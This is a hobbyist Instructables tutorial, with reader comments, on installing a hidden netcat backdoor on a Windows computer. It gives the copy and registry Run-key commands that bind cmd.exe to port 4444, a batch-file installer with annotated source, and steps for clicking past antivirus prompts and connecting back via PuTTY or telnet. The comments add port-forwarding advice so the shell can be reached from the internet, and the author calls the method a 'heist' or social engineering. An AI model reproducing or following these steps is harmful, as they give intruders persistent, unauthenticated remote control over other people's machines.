This instructable shows you how to create a backdoor on a computer with netcat! I will show you two ways to do this, with and without my batch file that automates it for you. This instructable already assumes that you have already got root permissions on the computer, probably with a 0phcrack LiveCD here. Now, onto the instructable.

Step 1: Download Netcat

I have saved you the trouble of 3 minutes of searching Google and have put nc.exe up on instructables for you to download. Optionally, you can also download nc.bat which is a batch file I have created to automate the process for you. Make sure that if you download nc.bat it is 464 bytes, because I kept on uploading versions and finding out something was wrong with it. If it is not 464 bytes, the program will not correspond with this instructable.

Step 2: With Nc.bat

First, both files must be in the same directory for nc.bat to work properly. I suggest using a flash drive, or CD-ROM for this operation. I used a 512 mb geek squad flash drive for this, but that is just me. So, copy the files onto your external media device, and bring them to the computer that you have root on. Get on the media device and double-click nc.bat. This will copy the nc.exe file to the system32 folder, in the system root (usually C:\Windows or C:\WINNT) and make the necessary changes to the registry. Then write down the IP address. It will be something like '', which is mine. Once this is done, reboot the machine and login. Then the anti-virus program may ask you if you want to allow/disallow the program. Click on 'Allow' or similar. Keep in mind that in this instructable, you can only telnet in from the local network of that computer. Then leave, or log off, or whatever else you want.

Step 3: Without Nc.bat

To do this, you have to have nc.exe on a CD or Flash drive. Go over to the computer, login, and plug in the flash drive or put in your CD.

From here, there are two ways: The polished-up graphical user interfaces of windows, or the dirty, old-fashioned way of the command prompt.

The dirty, old-fashioned command prompt way:
Pull up the command prompt by going to Start-->Run and type in:
Navigate your way to the flash or your CD drive. If you do not know which drive is which, right-click on the start button and click explore. Click on all the non-local drives in My Computer until you come to your flash/CD drive. Remember the letter of the drive and go back to the command prompt. Type in the letter of the drive followed by a colon, like this: K:
Then type in one line at a time, followed by hitting the return key:
copy nc.exe %systemroot%\system32\nc.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exe"

That was pretty much the installation. All you need to know now is the local IP address, which can easily be found by typing in the 'ipconfig' command and looking for something in the table like "". Then reboot the machine and log back in. The anti-virus program might ask you if you want to allow/disallow. Click allow. Then you are free to do what you want with the computer.

The polished-up graphical interfaces of Windows

Right-click on the start button and click explore. Click on all the non-local drives in My Computer until you come to your flash/CD drive. Then right-click nc.exe and copy. Then go to the C drive and click on the Windows or WINNT folder. Then go to the system32 folder and paste nc.exe. Close that out, and go to Start-->Run. Type in regedit. Navigate through the folders to:


Then right click an empty space and go to New-->String Value. Type whatever you want for the name, but for the value, type in:
%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exe

That was pretty much the installation. All you need to know now is the local IP address, which can easily be found by typing in the 'ipconfig' command into the command prompt (Start-->Run:cmd.exe) and looking for something in the table like "". Then reboot the machine and log back in. The anti-virus program might ask you if you want to allow/disallow. Click allow. Then you are free to do what you want with the computer.

Step 4: Going Back In

Once you have it installed, and you want to take control of the host, open up the command prompt or PuTTY. I think PuTTY is awesome, so I will let you download it here.

Using PuTTY

Download and open PuTTY.exe. Click on the 'raw' protocol. In the port # text box, type in 4444. In the 'host address' box, type in the IP address you wrote down during installation. Then hit enter. PuTTY should connect to the box and you will get a command prompt.

Using Command Prompt

Open the command prompt and type in 'telnet <enter the IP address you wrote down here> 4444'.
Then hit enter, and you should get a command prompt.

This will let you do nearly anything you want to the computer remotely that you can do with a local account. It really starts to get interesting when you go into one computer, and then go into another computer from that computer, to get a whole chain of computers connected together.

Have (legal) fun!

Step 5: Source Code

Because I have been asked, I will put up the source code (for the batch file) and explain each command and what it does. Be Aware! This is the current version of the batch install program. If yours is different, the code will differ.

@echo offcopy nc.exe %systemroot%\system32\nc.exeif errorlevel 0 goto regeditgoto error:regeditreg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exe"if errorlevel 0 goto ip:errorecho something unexpected has occurred, and the program needs to exit.goto end:ipecho write down the IP address from the tableipconfig:endecho end.echo duct tape out.pause
@echo off-Tells it not to show the commands when executing.
copy nc.exe %systemroot%\system32\nc.exe-usually copies netcat into C:\WINDOWS\system32. This makes it so when you go back in, instead of changing directories all the time, you can just type "nc" to open another port.
if errorlevel 0 goto regedit-error checking. If the copy was successful, It goes on to edit the registry.
goto error-If an error occured, go on to the :error label.
:regedit-A label, specifying that when the program says "goto regedit", to go here.
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exe"-(supposed to be one line) that adds the registry key to restart the program when rebooted. /f means overwrite existing key, /v for key name, /d for data. The rest of the tags are input for netcat. -L says to restart it on exit, so you don't have to wait for the computer to restart. -d i forgot. -p 4444 specifies port #. -t i forgot. -e cmd.exe makes the command prompt start on remote connection.
if errorlevel 0 goto ip-error checking. If the run went wrong it would skip this line and go down to the :error label.
echo something unexpected has occurred, and the program needs to exit.-tells the program to print "something unexpected has occurred, and the program needs to exit" on the screen.
goto end-if it went to the error message, something went wrong and the program needs to close anyway.
:ip-Again, label.
echo write down the IP address from the table-Writes "write down the IP address from the table" to the screen.
ipconfig-This is a command that prints information about your local area network (LAN) settings.
echo end.-writes "end" to the screen.
echo duct tape out.-writes "duct tape out" to the screen.
pause-this command pauses the program, and waits for the user to press a key. In this program, it waits for input and then exits the program.
Nice. I'm gonna go ahead and make an unnc.bat to undo it.
Here's my idea. Go under your home router and enable forwarding of nc.exe on port 4444, then you could access the computer from any internet connection. I've got two computers, but my old laptop doesn't like our network, probably cause it has windows and linux on it.... If I look at all the computers on the network, it appears (when it's turned on and hooked up to the router), but not it's shared files (they are turned on to share, i'm not an idiot). If I try to see any other computers on the network from this computer, I can't see any. It's kinda like a one-way mirror. It can connect to the internet fine, but not the network. It's set up just like my desktop. Obviously, netcat won't work.
could you explain how to do that?
Before I tell you how to do it, let me go ahead and tell you that if you do it, ANYONE who has internet (millions of people) could log into your computer and control it, so I would REALLY recommend not doing it, even to someone else's computer. With that being said, you need to forward port 4444. Your router acts as a firewall that blocks people from connecting to you that shouldn't be. If you want to communicate with the outside world, you have to tell your router you want to &quot;forward&quot; that port. It will only forward it from the outside world to one IP address. Go check out <a rel="nofollow" href="http://portforward.com/routers.htm">http://portforward.com/routers.htm</a> to help you do that.<br/>
you might want to set up some sort of login to the machine so that anonymous entry is harder. An IP logger would be another good addition. <br />
that is strange. you went to whatismyip.org or something similar to find the IP address first, right?
Yeah. I'm not saying I've actually done it, but it should work.
go to Start and click on run and then on cmd and type in IPconfig/all and then find your IP address. :D
that only shows your network ip. to access it from the 'net you need the other one.
Hi can anyone tell how to use netcat on internet cuz i tried manytime but it didnt work.It works fine on lan network.so plz help.Thanks<br />
You need to know the external IP address of the target computer, and then set up the router so that it forwards all requests on the port you are using to the target. It should then be accessible through the internet.<br />
I used regedit to put temporary COSMOKEY keys on not as harmful
netcat error
My Anti virus (PC Tools) blocked it.
<a rel="nofollow" href="http://www.securityfocus.com/cgi-bin/index.cgi?c=toolcomments&amp;op=display_comments&amp;ToolID=139&amp;expand_all=true&amp;mode=threaded">http://www.securityfocus.com/cgi-bin/index.cgi?c=toolcomments&amp;op=display_comments&amp;ToolID=139&amp;expand_all=true&amp;mode=threaded</a><br/><br/>go there for netcat :D<br/>
nc.exe is a .tmp file, my antivirus got rid of it. and nc.bat is a webpage.
when I click on the files in this Instructable, it tries to download a tmp file.
tell it to save as &quot;all files&quot; then rename it &quot;netcat.exe&quot; or &quot;putty.exe&quot; it did that to me to<sup>are you useing ie8</sup><br/>
if you save it as netcat.exe, then nc.bat wont work(if you use it) you should save it as nc.exe
If you got here via google "download netcat", see the comments on "intro". nc.bat creates a backdoor on your computer if you run it.
-d is for stealth which will make the program run in backgraound and -t is for telnet mode it allows other machine to telnet to it
im having trouble how do you use the window that pops up after you open PuTTY?
and about 15 sec after i open the window it says "connection timmed out"
Yea hi if i port forwarded port 4444 to a computer on my network could i remotely access it from a computer off my network?
Yes. But I'd put a password or something on it. You would also need a static ip or a domain name from dyndns.com. What I do sometimes is make my computer into a file server with HFS. Just google it and you will come up with an idea...
yea i have a doman name i auctly have game and webservers and all that stuff running on it umm with this is their a way i can add files like from remote computer > host ??
Of course! Please tell me more about your set-up.
Rule no.0 never give away you ip adress on a site that teaches you how to hack
This isn't the actual ip address - it is the network ip. It doesn't matter if someone knows this, unless they are on your network.
When I downloaded nc.exe it was a .tmp file, so it didn't work. :o
Hey is my ip address(or at least it seems so)
i-am going to haaaaack youuuuuuu.
ha you're not as smart as you try to be.<br/>a &quot;192.168.x.x&quot; is the ip address <em>behind</em> his router. unless you also have the external ip (the one between your isp and you) , you cant do a single thing but hack <strong>your own</strong> router<br/>
I think he was making a joke...
Even with someone's ip you can't easily or readily hack them, a number of measures are in place "out of the box" on nearly every computer used nowadays. Regardless of whether or not they have a firewall, hacking is not as simple as script kiddies would have you believe.
i'm pretty sure that he was just joking.
dude, that's ur local ip, so nothing will happen to ur machine, k? mine was, too , at one time. a local ip is only for your home (or office) network.
lol ur point?
I have a question. What is a backdoor anyway?
How is that different from a VNC? Try ultavnc single click. E-mail it to your friend. When he runs it dials home. No worry about IP root files ect ect.
can u tell me where to get it please? and when u email it does ur friend have to do anything else besides downloading it? please reply thankyou
google ultavnc and check out their ultravnc single click. Yes , your friend needs to click on it. It is not a trojan and it will warn your friend that he/she is installing a remote viewing application.
It is different because you have to 'get down and dirty' with netcat, but the VNC takes the fun out of it. To get netcat on, you have to do either a sort of heist thing, or social engineering. With VNC, it is just point-and-click. Kinda boring....

About This Instructable




More by duct tape:How to make a Jacob's Ladder! SMTP Fun Netcat fun! 
Add instructable to: